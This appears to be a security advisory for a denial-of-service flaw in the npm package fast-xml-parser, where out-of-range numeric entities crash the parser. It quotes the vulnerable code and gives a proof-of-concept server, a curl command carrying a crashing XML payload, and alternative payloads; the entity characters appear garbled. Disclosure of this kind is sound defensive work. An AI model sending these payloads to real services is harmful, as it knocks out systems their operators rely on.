Asymmetric denial of service In fast-xml-parser
Description
fast-xml-parser has RangeError DoS Numeric Entities Bug
Summary
A RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., � or �). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input.
Details
The vulnerability exists in /src/xmlparser/OrderedObjParser.js at lines 44-45:
"num_dec": { regex: /&#([0-9]{1,7});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 10)) }, "num_hex": { regex: /&#x([0-9a-fA-F]{1,6});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 16)) },
The String.fromCodePoint() method throws a RangeError when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this:
[0-9]{1,7} matches up to 9,999,999
[0-9a-fA-F]{1,6} matches up to 0xFFFFFF (16,777,215)
The entity replacement in replaceEntitiesValue() (line 452) has no try-catch:
val = val.replace(entity.regex, entity.val);
This causes the RangeError to propagate uncaught, crashing the parser and any application using it.
PoC
Setup
Create a directory with these files:
poc/ ├── package.json ├── server.js
package.json
{ "dependencies": { "fast-xml-parser": "^5.3.3" } }
server.js
const http = require('http'); const { XMLParser } = require('fast-xml-parser'); const parser = new XMLParser({ processEntities: true, htmlEntities: true }); http.createServer((req, res) => { if (req.method === 'POST' && req.url === '/parse') { let body = '';...
Run
# Setup npm install # Terminal 1: Start server node server.js # Terminal 2: Send malicious payload (server will crash) curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0"?><root>�</root>' http://localhost:3000/parse...
Result
Server crashes with:
RangeError: Invalid code point 9999999
Alternative Payloads
<!-- Hex variant --> <?xml version="1.0"?><root>�</root> <!-- In attribute --> <?xml version="1.0"?><root attr="�"/>
Impact
Denial of Service (DoS):* Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects:
API servers accepting XML payloads
File processors parsing uploaded XML files
Message queues consuming XML messages
RSS/Atom feed parsers
SOAP/XML-RPC services
A single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
 npm | 5.3.4 |
Aliases
References